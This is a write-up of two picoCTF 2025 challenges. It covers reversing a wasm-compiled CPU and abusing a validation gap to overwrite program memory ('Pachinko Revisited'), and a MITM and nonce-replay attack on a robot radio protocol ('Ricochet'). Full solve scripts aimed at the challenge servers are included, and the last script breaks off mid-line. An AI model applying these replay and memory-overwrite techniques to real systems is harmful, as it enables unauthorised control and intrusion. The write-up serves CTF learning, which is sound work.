voxal
# picoCTF 2025 Writeups

## Pachinko Revisited

### writeup

We are given partial source for the remote server, with the source for the CPU missing. Instead we have a wasm binary that executes a single internal cycle of the processor via the exported `process` function. Decompiling the wasm binary in Ghidra and inspecting the `process` function shows a few thousand lines of bitwise xors. Given that the `synth_cpu` macro most likely synthesizes Verilog output into some Rust equivalent, we can assume that this giant block of xors is the compiled Verilog code.

```py=
bVar17 = state[0x43]
state[0x48] = bVar17 ^ 0xff
bVar16 = state[0x46]
state[0x49] = bVar16 ^ 0xff
....
bVar22 = bVar16 & state[0x66] ^ 0xff
state[0x47c] = bVar22
bVar22 = bVar22 & bVar30
```

We can extract this code from Ghidra into Python since it is all bitwise operators and array indexing.

Looking at the server js, we can see a list of the port definitions for the processor:

```javascript=
return {
  clock: getBitFromJson(json, "clock"),
  addr: getBitsFromJson(json, "addr"),
  inp_val: getBitsFromJson(json, "inp_val"),
  out_val: getBitsFromJson(json, "out_val"),
  reset: getBitFromJson(json, "reset"),
  write_enable: getBitFromJson(json, "write_enable"),
  halted: getBitFromJson(json, "halted"),
  flag: getBitFromJson(json, "flag"),
};
```

We can infer from how the code is splitting the port bits and the size of the memory array that `inp_val`, `out_val`, and `addr` are each 16 bits wide. `clock`, `reset`, `write_enable`, `halted`, and `flag` are all single bit ports.

Since Verilog requires input or output annotation on ports, you would expect that any input ports used in the CPU would be read from the state array, but never written to.
Checking this assumption yields 18 bits of state that are read but never written to:

```
00 state[0x13]
01 state[0x14]
02 state[0x15]
03 state[0x16]
04 state[0x17]
05 state[0x18]
06 state[0x19]
07 state[0x1a]
08 state[0x1b]
09 state[0x1c]
10 state[0x1d]
11 state[0x1e]
12 state[0x1f]
13 state[0x20]
14 state[0x21]
15 state[0x22]
16 state[0x44]
17 state[2]
```

That is 16 consecutive bits and 2 standalone bits, which matches up with the expected input ports: `inp_val`, `clock`, and `reset`. The consecutive run of bits is likely to be `inp_val`, while it is still unknown which of the two standalone bits is `clock` and which is `reset`.

Next we need to determine the offsets of the rest of the ports. Since memory is external, the processor will need to fetch each instruction from memory on every cycle. We expect that the `addr` output port will increment by at least 2 on every cycle. We can check this with a script that iterates over all sequences of 16 bits of the state array and looks for changes that increment by 2. Here we can also check which offsets of `clock` and `reset` are correct. If we guess `clock` and `reset` wrong, we expect that an increment of 2 will not appear since the clock is not stepping.

Checking the 2 possible combinations of `clock` and `reset` shows that the expected increment of 2 only appears with a `clk` offset of `0x02` and a `reset` offset of `0x44`. The increment also only appears in bits `0x12:0x03`, which is most likely the `addr` output port. Currently known ports look like:

```
02 -    => clk
03 - 12 => addr probably
13 - 22 => inp_val
23 - 32 => ??
33 - 42 => ??
43 -    => ??
44 -    => reset
45 -    => ??
46 -    => ??
```

This is just enough ports to start executing instructions, since we can respond to memory reads (but not memory writes yet). Taking a look at the 2 provided binaries (`nand_checker.bin` and `flag.bin`) we noticed that they both end in `0x000f`. This is most likely the `halt` instruction, and executing it confirms this: the cpu halts.
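The sliding-window search for the `addr` port described above could look roughly like the sketch below. It is not the script we ran. It assumes each state entry holds one bit, that multi-bit ports are stored least-significant bit first (the `0x12:0x03` notation suggests this, but it is still an assumption), and that `snapshots` holds one copy of the state per instruction fetch. The names `window_value`, `find_incrementing_ports`, and `fake_state` are made up for illustration.

```python
def window_value(bits, offset, width=16):
    """Read `width` consecutive one-bit entries as an integer, LSB first (assumed order)."""
    value = 0
    for i in range(width):
        value |= (bits[offset + i] & 1) << i
    return value


def find_incrementing_ports(snapshots, step=2, width=16):
    """Return offsets whose `width`-bit window grows by `step` between every pair of snapshots."""
    if len(snapshots) < 2:
        return []
    mask = (1 << width) - 1
    hits = []
    for offset in range(len(snapshots[0]) - width + 1):
        values = [window_value(s, offset, width) for s in snapshots]
        if all((b - a) & mask == step for a, b in zip(values, values[1:])):
            hits.append(offset)
    return hits


def fake_state(addr):
    """Synthetic 0x50-entry state with a 16-bit counter planted at offset 0x03."""
    bits = [0] * 0x50
    for i in range(16):
        bits[0x03 + i] = (addr >> i) & 1
    return bits


snapshots = [fake_state(a) for a in (0x0000, 0x0002, 0x0004, 0x0006)]
candidates = find_incrementing_ports(snapshots)
print([hex(o) for o in candidates])
```

On the real state array the same loop would be run once per guess of the `clock` and `reset` offsets; a wrong guess should produce no candidates at all.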
From here we just need to figure out what the `out_val` offset is, so we execute the `nand_checker` binary and look at which port (`0x32:0x23` or `0x42:0x33`) outputs values that look like they are being written to memory. Running `nand_checker` shows that `0x42:0x33` seems to increment by 4 every instruction, while `0x32:0x23` outputs constants that we know are written to memory. This tells us that `0x42:0x33` is probably the program counter, since the instructions are probably 4 bytes wide, and that `0x32:0x23` is `out_val`.

Since most of the port offsets have now been reversed, we can figure out which offsets correspond to `write_enable` and `halt` by running instructions from `nand_checker` and inspecting the behavior of nearby offsets `43`, `45`, `46`, `47`, `48`. Observing the behavior of these bits shows that `46` is most likely `halt` and `45` is most likely `write_enable`.

Now that we have all the ports needed to properly run the cpu, we can start reversing the behavior of `nand_checker`. We know that the program is simulating the behavior of `nand` gates, and that certain inputs/outputs are placed at constant addresses in memory. Using this information and our local cpu implementation we start to slowly reverse the behavior of the instructions.
```x86asm
; nand_checker.bin
0x0000 load_imm r4, 0x3000
0x0004 load_imm r5, 0x1000
0x0008 load_imm r6, 0x2000
0x000c load_imm r0, 0x0
0x000e add r0, r4
0x0010 load_imm r2, 0x1000
0x0014 load r1, [r0]
0x0016 add_imm r0, 0x2
0x0018 jmp_if_0 r1, 0x22
0x001a r1 = (r1 < r2)
0x001c jmp_if_0 r1, 0x4c
0x001e load_imm r1, 0x0
0x0020 jmp_if_0 r1, 0x14
0x0022 load r0, [r4]
0x0024 add_imm r4, 0x2
0x0026 load r1, [r4]
0x0028 add_imm r4, 0x2
0x002a load r2, [r4]
0x002c add_imm r4, 0x2
0x002e jmp_if_0 r0, 0x4c
0x0030 jmp_if_0 r1, 0x4c
0x0032 jmp_if_0 r2, 0x4c
0x0034 shl r0, 1
0x0036 shl r1, 1
0x0038 shl r2, 1
0x003a add r0, r6
0x003c add r1, r6
0x003e add r2, r6
0x0040 load r0, [r0]
0x0042 load r1, [r1]
0x0044 nand r0, r1
0x0046 store [r2], r0
0x0048 load_imm r7, 0x0
0x004a jmp_if_0 r7, 0x22
0x004c load r0, [r5]
0x004e load_imm r1, 0xffff
0x0052 load_imm r2, 0x2
0x0054 load_imm r7, 0x0
0x0056 add r5, r2
0x0058 add r6, r2
0x005a load r3, [r5]
0x005c load r4, [r6]
0x005e r3 = (r7 < r3)
0x0060 r4 = (r7 < r4)
0x0062 add r3, r4
0x0064 jmp_if_0 r3, 0x6c
0x0066 r3 = (r3 < r2)
0x0068 jmp_if_0 r3, 0x6c
0x006a jmp_if_0 r7, 0x72
0x006c add r0, r1
0x006e jmp_if_0 r0, 0x7e
0x0070 jmp_if_0 r7, 0x56
0x0072 load_imm r0, 0x3333
0x0076 load_imm r5, 0x1000
0x007a store [r5], r0
0x007c halt
0x007e load_imm r0, 0x1337
0x0082 load_imm r5, 0x1000
0x0086 store [r5], r0
0x0088 halt
```

```x86asm
; flag.bin
0x0000 load_imm r0, 0x6f73
0x0004 load_imm r1, 0x6563
0x0008 load_imm r2, 0x2e69
0x000c load_imm r3, 0x6f00
0x0010 flag_magic
0x0012 halt
```

Now we can inspect the behavior of `nand_checker`. It reads the circuit node offsets at `0x3000` and validates that each number is less than `0x1000`. Then it performs the actual processing of the input nand circuit and finally checks the input state against the expected output state.

In order to get the flag, we need to load magic numbers into registers `r0` through `r3` and execute the `flag_magic` instruction.
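As a cross-check on the `flag.bin` listing, the program can be re-encoded into 16-bit words. This is only a sketch under the encoding used by the disassembler script in this writeup: the opcode sits in the low nibble of the first byte, the destination register in the high nibble, `0xd` is the 4-byte `load_imm`, `0xe` is `flag_magic`, and `0xf` is `halt`. The function names are invented for this example.

```python
def load_imm16(reg, imm):
    """4-byte load_imm: opcode 0xd in the low nibble, register in the next nibble,
    followed by the 16-bit immediate as a second word."""
    return [(reg << 4) | 0xD, imm & 0xFFFF]


def flag_magic():
    return [0x000E]


def halt():
    return [0x000F]


def assemble_flag_program(magic):
    """Load magic[i] into r<i>, then run flag_magic and halt."""
    words = []
    for reg, value in enumerate(magic):
        words += load_imm16(reg, value)
    return words + flag_magic() + halt()


words = assemble_flag_program([0x6F73, 0x6563, 0x2E69, 0x6F00])
print(" ".join(f"{w:04x}" for w in words))

# Serialise as little-endian 16-bit words, the way the analysis script reads programs.
blob = b"".join(w.to_bytes(2, "little") for w in words)
print(len(blob))
```

The ten words come out as the same values the solve script writes over `nand_checker`, and the 20-byte length matches the listing, where `halt` sits at `0x0012`.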
However the `nand_checker` program never executes the `flag_magic` instruction. Since the program instructions and input/output are all located in the same memory space, the intended solution likely involves overwriting `nand_checker` with a new program that will execute the instructions to set the flag bit.

We noticed that while the program validates that the circuit nodes are all less than `0x1000`, it multiplies them by 2 before using them to index the `inputs` array at `0x2000`. A node index of `0x800` or more therefore lands at `0x2000 + 2 * 0x800 = 0x3000` or above, which is the circuit itself. This means we can modify the circuit nodes at `0x3000` while the program is processing them, after they have already been validated. Writing `0xfff` to the output node of a nand gate, then inverting it to `0xf000`, will generate an offset of `0xe000` when scaled by 2. `(0xe000 + 0x2000) & 0xffff == 0x0000`, which lets us modify the instructions of `nand_checker`.

From here we just need to patch the `nand r0, r1` instruction to `add r0, r1`, which allows us to construct a 2 byte arbitrary write primitive. From here exploitation is simple. We overwrite the instructions after the nand processing loop with the instructions from `flag.bin`. Once the cpu halts the flag bit will be set and we get the second flag.
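The check-then-use gap can be reproduced with a small Python model of the first two loops of `nand_checker`. This is a paraphrase of the disassembly, not the real CPU: memory is a dict of 16-bit words, the helper names are made up, and the two gates below are chosen only to show the effect; they are not the ones from the solve script.

```python
MASK = 0xFFFF
CIRCUIT, INPUTS = 0x3000, 0x2000


def nand16(a, b):
    return ~(a & b) & MASK


def node_address(node):
    """`shl node, 1` followed by `add node, r6` (r6 = 0x2000), with 16-bit wraparound."""
    return ((node << 1) + INPUTS) & MASK


def run_checker_loops(mem):
    """Model of the validation loop (0x14-0x20) and the gate loop (0x22-0x4a)."""
    ptr = CIRCUIT
    while True:  # pass 1: every node must be < 0x1000, a zero word ends the list
        node = mem.get(ptr, 0)
        ptr += 2
        if node == 0:
            break
        if not node < 0x1000:
            return False  # the real program jumps to 0x4c and skips the gate loop
    ptr = CIRCUIT
    while True:  # pass 2: evaluate gates, nothing is validated again
        a, b, out = (mem.get(ptr + k, 0) for k in (0, 2, 4))
        ptr += 6
        if a == 0 or b == 0 or out == 0:
            break
        mem[node_address(out)] = nand16(mem.get(node_address(a), 0),
                                        mem.get(node_address(b), 0))
    return True


# Gate 0 reads and rewrites node 0x805, which aliases gate 1's output field at 0x300a.
gates = [(0x805, 0x805, 0x805), (0x001, 0x001, 0xFFF)]
mem = {}
for i, word in enumerate(w for gate in gates for w in gate):
    mem[CIRCUIT + 2 * i] = word

ok = run_checker_loops(mem)
print(ok, hex(mem[0x300A]), hex(mem[0x0000]))
```

Every node passes validation, yet gate 0 flips gate 1's output field from `0xfff` to `0xf000`, so gate 1 stores its result at address `0x0000`, on top of the first instruction. With the same helper, `node_address(0xf000 + 38)` evaluates to `0x4c`, the first instruction after the gate loop, which is where the solve script starts writing.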
### scripts

#### solve script

```py=
import requests

IN1, IN2, IN3, IN4 = range(5, 9)
OUT1, OUT2, OUT3, OUT4 = range(1, 5)

def con(a: int, b: int, o: int):
    return { "input1": a, "input2": b, "output": o }

def num(n: int, const: int, dest: int):
    r = []
    for b in f"{n:0b}"[1:]:
        r.append(con(dest, dest, dest))
        if b == "1":
            r.append(con(0 + const, dest, dest))
    return r

def write(base: int, addr: int, n: int):
    total = base - 4 + addr.bit_length() + addr.bit_count() + n.bit_length() + n.bit_count()
    total *= 3
    const = total + 3
    r = [
        *num(addr, 0x800 + const, 0x800 + total + 2),
        *num(n, 0x800 + const, 0x800 + const + 1),
        con(0xff0, 0x800 + const + 1, 1),
        con(1, 1, 1),
    ]
    return r

A = 0
B = A + 6
TARGET = A + 10 * 3

circ= [
    con(0xfff, 0xfff, 0xfff),
    con(0xfff, 0xfff, 0xfff),
    con(0x22, 0x101, 0x101),
    con(0x800 + A + 0, 0x800 + A + 1, 0x800 + TARGET + 2),
    con(0x800 + A + 2, 0x800 + A + 3, 0x800 + TARGET + 2),
    con(0x800 + A + 4, 0x800 + A + 5, 0x800 + TARGET + 2),
    con(0x800 + TARGET + 2, 0x800 + TARGET + 2, 0x800 + TARGET + 2),
    con(0x800 + B + 0, 0x800 + B + 0, 0x800 + B + 0),
    con(0x800 + TARGET + 2, 0x800 + B + 0, 0x800 + TARGET + 2),
    con(0x800 + B + 1, 0x800 + B + 1, 0x800 + B + 2),
    con(0x800 + B + 2, 0x800 + B + 2, 1),
]

circ.extend(write(len(circ), 0xf000 + 38, 0x0d))
circ.extend(write(len(circ), 0xf000 + 39, 0x6f73))
circ.extend(write(len(circ), 0xf000 + 40, 0x1d))
circ.extend(write(len(circ), 0xf000 + 41, 0x6563))
circ.extend(write(len(circ), 0xf000 + 42, 0x2d))
circ.extend(write(len(circ), 0xf000 + 43, 0x2e69))
circ.extend(write(len(circ), 0xf000 + 44, 0x3d))
circ.extend(write(len(circ), 0xf000 + 45, 0x6f00))
circ.extend(write(len(circ), 0xf000 + 46, 0x0e))
circ.extend(write(len(circ), 0xf000 + 47, 0x0f))

HOST = "http://activist-birds.picoctf.net:61075/"
res = requests.post(f"{HOST}/check", json={ "circuit": circ })
print(res.status_code)
print(res.text)
print(res.json())
```

#### readonly/writeonly script

```py=
import re

prog = open("prog.txt").read()
lines = prog.strip().splitlines()

reads = []
writes = []
for line in lines:
    d, s = line.strip().split(" = ")
    reads.extend(re.findall(r"state\[.+?\]", s))
    if d.startswith("state"):
        writes.append(d)

writeonly = set()
for w in writes:
    if w not in reads:
        o = w.split("[")[1]
        o = o.split("]")[0]
        o = int(o, 0)
        if o > 0x100:
            continue
        writeonly.add(w)

readonly = set()
for r in reads:
    if f"{r} =" not in prog:
        readonly.add(r)

print(f"READONLY")
for i, r in enumerate(sorted(readonly)):
    print(f"{i+1:02} {r}")

print(f"WRITEONLY")
for i, r in enumerate(sorted(writeonly)):
    print(f"{i+1:02} {r}")
```

#### analysis script

```py=
# cpu.py (not shown) is assumed to provide run(), BitView, MAX and the I_*/O_* port offsets
from cpu import *
import colorama

class Machine:
    def __init__(self):
        self.state = bytearray([0] * 100_000)
        self.insns = None
        self.inputs = None
        self.outputs = None
        self.circuit = None
        self.iters = 0

    @property
    def v(self):
        return BitView(self.state)

    def reset(self):
        run(self.state)
        self.v[I_RST] = 1
        run(self.state)
        self.v[I_RST] = 0
        run(self.state)

    def save(self):
        self.saved_state = bytearray(len(self.state))
        self.saved_state[:] = self.state
        self.saved_insns = copy.deepcopy(self.insns)
        self.saved_inputs = copy.deepcopy(self.inputs)
        self.saved_outputs = copy.deepcopy(self.outputs)
        self.saved_iters = self.iters
        self.saved_circuit = copy.deepcopy(self.circuit)

    def restore(self):
        self.state = self.saved_state
        self.insns = self.saved_insns
        self.inputs = self.saved_inputs
        self.outputs = self.saved_outputs
        self.iters = self.saved_iters
        self.circuit = self.saved_circuit

    def step(self, hijack: int = None, show = True):
        self.iters += 1
        self.v[I_CLK] ^= 1
        run(self.state)

        c = self.v[0x02] # clk
        d = self.v[0x03:0x13] # addr
        e = self.v[0x13:0x23] # inp val
        f = self.v[0x23:0x33] # out val
        g = self.v[0x33:0x43] # pc probably
        h = self.v[0x43] # ??
        i = self.v[0x44] # reset
        j = self.v[0x45] # write enable
        k = self.v[0x46] # halt
        l = self.v[0x47] # flag maybe?
        m = self.v[0x48]
        n = self.v[0x49]
        o = self.v[0x4a]
        # if j == 1:
        # if l == 1:
        #     print(c, f"{d:08x}", f"{e:08x}", f"{f:08x}", h, i, f"w={j}", f"h={k}", f"f={l}", m, n, o)
        #     break
        if show:
            print(c, f"{d:08x}", f"{e:08x}", f"{f:08x}", f"pc={g:04x}", h, i, f"w={j}", f"h={k}", f"f={l}", m, n, o)

        addr = self.v[O_ADDR:O_ADDR+0x10]
        # assert (addr & 1) == 0, f"{addr:04x}"
        if self.v[I_CLK] == 0:
            # service memory writes
            if self.v[O_WREN] == 1:
                print(f"writing to {addr:04x}")
                print([f"{hex(i)}" for i in self.circuit[TARGET-3:TARGET+3]])
                if addr >= 0x3000:
                    self.circuit[(addr - 0x3000) >> 1] = self.v[O_DATA:O_DATA+0x10]
                elif addr >= 0x2000:
                    self.inputs [(addr - 0x2000) >> 1] = self.v[O_DATA:O_DATA+0x10]
                elif addr >= 0x1000:
                    self.outputs[(addr - 0x1000) >> 1] = self.v[O_DATA:O_DATA+0x10]
                else:
                    self.insns  [(addr - 0x0000) >> 1] = self.v[O_DATA:O_DATA+0x10]

            # service memory reads
            # print(f"reading from {addr:04x}")
            if addr < 0x1000:
                # print(f"{addr = :#x}")
                try:
                    self.v[I_DATA:I_DATA+0x10] = hijack or self.insns[addr >> 1]
                except IndexError:
                    print(f"insn fetch error")
                    return False
            elif addr >= 0x4000:
                pass
            # cases in descending order
            elif addr >= 0x3000:
                self.v[I_DATA:I_DATA+0x10] = self.circuit[(addr - 0x3000) >> 1]
            elif addr >= 0x2000:
                self.v[I_DATA:I_DATA+0x10] = self.inputs [(addr - 0x2000) >> 1]
            elif addr >= 0x1000:
                self.v[I_DATA:I_DATA+0x10] = self.outputs[(addr - 0x1000) >> 1]

        return not self.v[O_HALT]

IN1, IN2, IN3, IN4 = range(5, 9)
OUT1, OUT2, OUT3, OUT4 = range(1, 5)

def con(a: int, b: int, o: int):
    return { "input1": a, "input2": b, "output": o }

circ = [
    con(IN1, IN1, OUT1),
    con(IN2, IN2, OUT2),
    con(IN3, IN3, OUT3),
    con(IN4, IN4, OUT4),
]

def num(n: int, const: int, dest: int):
    r = []
    for b in f"{n:0b}"[1:]:
        r.append(con(dest, dest, dest))
        if b == "1":
            r.append(con(0 + const, dest, dest))
    return r

def write(base: int, addr: int, n: int):
    total = base - 4 + addr.bit_length() + addr.bit_count() + n.bit_length() + n.bit_count()
    total *= 3
    const = total + 3
    r = [
        *num(addr, 0x800 + const, 0x800 + total + 2),
        *num(n, 0x800 + const, 0x800 + const + 1),
        con(0xff0, 0x800 + const + 1, 1),
        con(1, 1, 1),
    ]
    return r

# writes = [
#     *num(0x0f)
# ]

A = 0
B = A + 6
TARGET = A + 10 * 3

circ= [
    con(0xfff, 0xfff, 0xfff),
    con(0xfff, 0xfff, 0xfff),
    con(0x22, 0x101, 0x101),
    con(0x800 + A + 0, 0x800 + A + 1, 0x800 + TARGET + 2),
    con(0x800 + A + 2, 0x800 + A + 3, 0x800 + TARGET + 2),
    con(0x800 + A + 4, 0x800 + A + 5, 0x800 + TARGET + 2),
    con(0x800 + TARGET + 2, 0x800 + TARGET + 2, 0x800 + TARGET + 2),
    con(0x800 + B + 0, 0x800 + B + 0, 0x800 + B + 0),
    con(0x800 + TARGET + 2, 0x800 + B + 0, 0x800 + TARGET + 2),
    con(0x800 + B + 1, 0x800 + B + 1, 0x800 + B + 2),
    con(0x800 + B + 2, 0x800 + B + 2, 1),
]

circ.extend(write(len(circ), 0xf000 + 38, 0x0d))
circ.extend(write(len(circ), 0xf000 + 39, 0x6f73))
circ.extend(write(len(circ), 0xf000 + 40, 0x1d))
circ.extend(write(len(circ), 0xf000 + 41, 0x6563))
circ.extend(write(len(circ), 0xf000 + 42, 0x2d))
circ.extend(write(len(circ), 0xf000 + 43, 0x2e69))
circ.extend(write(len(circ), 0xf000 + 44, 0x3d))
circ.extend(write(len(circ), 0xf000 + 45, 0x6f00))
circ.extend(write(len(circ), 0xf000 + 46, 0x0e))
circ.extend(write(len(circ), 0xf000 + 47, 0x0f))

circuit: list[int] = []
for c in circ:
    circuit.append(c["input1"])
    circuit.append(c["input2"])
    circuit.append(c["output"])

# circuit = [0xffff, 0xffff, 0xffff]
circuit.extend([0] * 0x2000)

# pc=001a insn=1712 r0=3002 r1=0001 r2=1000 r3=0000 r4=3000 r5=1000 r6=2000 r7=0000
# pc=0060 insn=4774 r0=0004 r1=ffff r2=0002 r3=0000 r4=0001 r5=1002 r6=2002 r7=0000
A = 0xffff
B = 0x0000
inputs = [0] * 5 + [0, 0, 0, 0] + [0] * 0x1000
outputs = [0x0004, 0, 0, 0, 0] + [0] * 0x1000

insns = open("programs/nand_checker.bin", "rb").read()
insns = [int.from_bytes(insns[i:i+2], "little") for i in range(0, len(insns), 2)]
insns += [0x0f] * 16

import copy

def create():
    m = Machine()
    m.insns = copy.copy(insns)
    m.inputs = copy.copy(inputs)
    m.outputs = copy.copy(outputs)
    m.circuit = copy.copy(circuit)
    return m

# m = create()
# while m.step(show=True):
#     pass
# exit(1)

import pickle

regs = [f"r{i}" for i in range(8)]
# instruction size in bytes, keyed by opcode (low nibble of the first byte)
sizes = {
    0xd: 4,
    0xc: 2,
    0x8: 2,
    0xb: 2,
    0x4: 2,
    0x7: 2,
    0x1: 2,
    0x6: 2,
    0x9: 2,
    0xf: 2,
}

try:
    dump = pickle.load(open("dump.pk", "rb"))
except:
    dump = { 0: {} }

prev = {}
for reg in regs:
    prev[reg] = 0

pc = max(dump.keys())
m = create()
show = False
for i in range(MAX):
    dump[pc] = {}
    # m.step()
    # if m.v[O_HALT] == 1:
    #     break
    # run until the current instruction has retired and the next fetch is on the bus
    while m.v[O_PC:O_PC+0x10] == pc or (m.v[O_PC:O_PC+0x10] != m.v[O_ADDR:O_ADDR+0x10]):
        m.step(show=show)
        if m.v[O_HALT] == 1:
            print(m.iters)
            print("done")
            raise RuntimeError()

    idx = pc >> 1
    size = 0
    size = sizes[insns[idx] & 0b1111]
    new = m.v[O_PC:O_PC+0x10]
    ib = m.insns[idx:idx+(size>>1)]
    ib = " ".join(f"{n&0xff:02x}{n>>8:02x}" for n in ib)
    # print(f"{new = :#x}")

    # print("DUMPING")
    # leak each register by hijacking the fetch with a `load rj, [rj]` and reading the addr port
    for j in range(len(regs)):
        m.save()
        reg = regs[j]
        if reg not in dump[pc]:
            insn = 0b1011 | (j << 3) | (j << 8)
            m.v[I_DATA:I_DATA+0x10] = insn
            m.step(hijack=insn, show=False)
            try:
                m.step(hijack=insn, show=False)
            except:
                pass
            dump[pc][reg] = m.v[O_ADDR:O_ADDR+16]
        m.restore()
        pass

    coloring = [reg not in prev or prev[reg] != dump[pc][reg] for reg in regs]
    regdump = [f"{r}={dump[pc][r]:04x}" for r in regs]
    regdump = [f"{colorama.Fore.LIGHTRED_EX}{r}{colorama.Fore.RESET}" if c else r for (c, r) in zip(coloring, regdump)]
    regdump = " ".join(regdump)
    print(f"{pc=:04x} insn={ib:<9} {regdump}")
    # print("DONE")
    prev = dump[pc]
    pc = new
```

#### disassembler script

```py=
import io
import sys

def split_upper(upper: int):
    return (upper & 0xf), (upper >> 4) & 0xf

class Diassem:
    def __init__(self, bytes):
        self.b = io.BytesIO(bytes)

    def read_op_regs(self):
        bt = self.b.read(2)
        if len(bt) < 2:
            raise Exception("out of instructions")
        op = bt[0] & 0xf
        reg1 = (bt[0] >> 4) & 0xf
        return op, reg1, bt[1]

    def disassem(self):
        out = []
        try:
            lut = [
                self.read_0, # 0
                self.read_1, # 1
                self.read_stub, # 2
                self.read_stub, # 3
                self.read_4, # 4
                self.read_stub, # 5
                self.read_6, # 6
                self.read_7, # 7
                self.read_8, # 8
                self.read_9, # 9
                self.read_stub, # a
                self.read_b, # b
                self.read_c, # c
                self.read_d, # d
                self.read_e, # e
                self.read_f, # f
            ]
            while True:
                op, reg1, upper = self.read_op_regs()
                out.append(f"0x{(self.b.tell() - 2):04x}\t" + lut[op](op, reg1, upper))
        except Exception as e:
            print(e)
        finally:
            print("\n".join(out))

    def read_stub(self, op, reg1, reg2):
        return f"??? {op} r{reg1} {reg2}"

    def read_0(self, op, reg1, upper):
        return f"nop"

    def read_1(self, op,reg1, upper):
        # owen insisted
        if reg1 == upper:
            return f"shl r{reg1}, 1"
        return f"add r{reg1}, r{upper}"

    def read_4(self, op, reg1, upper):
        return f"add_imm r{reg1}, {hex(upper)}"

    def read_6(self, op, reg1, upper):
        return f"nand r{reg1}, r{upper}"

    def read_7(self, op, reg1, upper):
        reg2, reg3 = split_upper(upper)
        return f"r{reg1} = (r{reg3} < r{reg2})"

    def read_8(self, op, reg1, upper):
        return f"load_imm r{reg1}, {hex(upper)}"

    def read_9(self, op, reg1, reg2):
        return f"store [r{reg1}], r{reg2}"

    def read_b(self, op, reg1, reg2):
        return f"load r{reg1}, [r{reg2}]"

    def read_c(self, op, reg1, addr):
        return f"jmp_if_0 r{reg1}, {hex(addr)}"

    def read_d(self, op, reg1, reg2):
        # 4-byte form: the 16-bit immediate follows the opcode word
        imm = int.from_bytes(self.b.read(2), "little")
        return f"load_imm r{reg1}, {hex(imm)}"

    def read_e(self, op, reg1, upper):
        return "flag_magic"

    def read_f(self, op, reg1, reg2):
        # flag a halt whose operand fields are not all zero
        return f"halt {'(strange)' if reg1 or reg2 else ''}"

file = open(sys.argv[1], "rb").read()
dis = Diassem(file)
dis.disassem()
```

## Ricochet

1. Notice that changing the address of the controller allows you to MITM the robot -> controller channel.
2. Notice that the nonce resets, and that you can reuse the packets that were previously played to make the robot do things without the controller's consent.
3. Notice that sending back the secure_data_request packet to the robot allows the nonce to be incremented without doing anything (not included in the 20 move limit).

Using all this, we can painstakingly put together a hand made solve script to get the flag.
It only works some of the time because of certain race conditions with changing the controller's address. ### solve script ```py= from asyncio import wait_for import requests import time import json import copy from pwn import log, sleep """ original RC addr is 16 new RC addr is 0 robot addr is 32 ack and request have empty bodies """ TYPE = "msg_type" DST = "dst" SRC = "src" RC = 16 BOT = 32 ME = 1 MSG = "message" ENC = "encrypted" SERVER_URL = "http://activist-birds.picoctf.net:51576/" y = input("reuse? ") if y.lower() in ["y" or "yes"]: ALL = json.load(open("radio_rx.json", "r")) else: req = requests.get(SERVER_URL + "/radio_rx") print(f"{req.status_code = }") ALL = json.loads(req.text) with open("radio_rx.json", "w+") as fp: json.dump(ALL, fp) secure_data = {} secure_data_response = {} secure_data_ack = {} secure_data_request = {} controller_nonce = 0 robot_nonce = 0 for i in ALL: if i['msg_type'] == 'secure_data': i['dst'] = '0' secure_data[robot_nonce] = i robot_nonce += 1 if i['msg_type'] == 'secure_data_response': secure_data_response[controller_nonce] = i controller_nonce += 1 if i['msg_type'] == 'secure_data_ack': secure_data_ack[controller_nonce] = i controller_nonce += 1 if i['msg_type'] == 'secure_data_request': i['dst'] = '0' secure_data_request[robot_nonce] = i robot_nonce += 1 # Returns a list of messages seen on the air since the last time this function # was called def receive_radio_messages(): messages = requests.get(SERVER_URL+"/radio_rx").json() for msg in messages: log.info(f"Received message: {msg}") return messages def wait_for_radio_message(type: str): all = [] while True: msgs = receive_radio_messages() all.extend(msgs) for msg in msgs: if msg["msg_type"] == type: log.info(f"FOUND MSG OF TYPE {type}") return all # [message] argument should be a Python dict object def inject_radio_message(message, msg_type = None, dst = None, src = None, show = False): message = copy.deepcopy(message) if msg_type is not None: message[TYPE] = msg_type if dst 
is not None: message[DST] = dst if src is not None: message[SRC] = src if show: log.info(f"injecting: {message}") requests.post(SERVER_URL+"/radio_tx", json=message) def start_robot(): requests.get(SERVER_URL+"/start") def stop_robot(): requests.get(SERVER_URL+"/stop") def get_board_state(): return requests.get(SERVER_URL+"/state").json() start_robot() wait_for_radio_message("debug") inject_radio_message({"msg_type": "set_addr", "dst": 16, "src": 1, "new_addr": 0}) a = wait_for_radio_message("secure_data")[-1] log.info(f"got a = {a.get(ENC)[:16]}") inject_radio_message(secure_data_ack[2], dst=BOT) bot_nonce = 3 rc_nonce = 2 wait_for_radio_message("secure_data_request") for _ in range(10): if bot_nonce % 2 == 1: bot_msg = secure_data_request[bot_nonce] else: bot_msg = secure_data_ack[bot_nonce] inject_radio_message(bot_msg, dst=BOT, msg_type="secure_data_response") wait_for_radio_message("secure_data_request") if rc_nonce % 2 == 1: inject_radio_message(secure_data_request[rc_nonce], dst=0, src=1) wait_for_radio_message("secure_data_response") else: inject_radio_message(secure_data[rc_nonce], dst=0, src=1) wait_for_radio_message("secure_data_ack") log.info("incremented BOT and RC") bot_nonce += 1 rc_nonce += 1 log.info(f"BOT nonce is now {bot_nonce}") log.info(f"RC nonce is not {rc_nonce}") # BOT is still waiting for secure_data_response # RC is idling inject_radio_message(secure_data[rc_nonce], dst=0, src=1) wait_for_radio_message("secure_data_ack") rc_nonce += 1 # rc nonce is now 13 inject_radio_message({ TYPE: "set_addr", DST: 0, SRC: 1, "new_addr": 16 }) wait_for_radio_message("ack_set_addr") inject_radio_message(secure_data_request[bot_nonce], dst=16, src=32) rc_nonce += 1 # rc nonce is now 14 # high nonces should start at 14 now high = [] for i in range(19): print(i) high.extend(wait_for_radio_message("secure_data_response")) log.info(f"ignoring {high[0]}") high = high[1:] with open("high.json", "w+") as fp: json.dump(high, fp) # sleep(10) # a = 
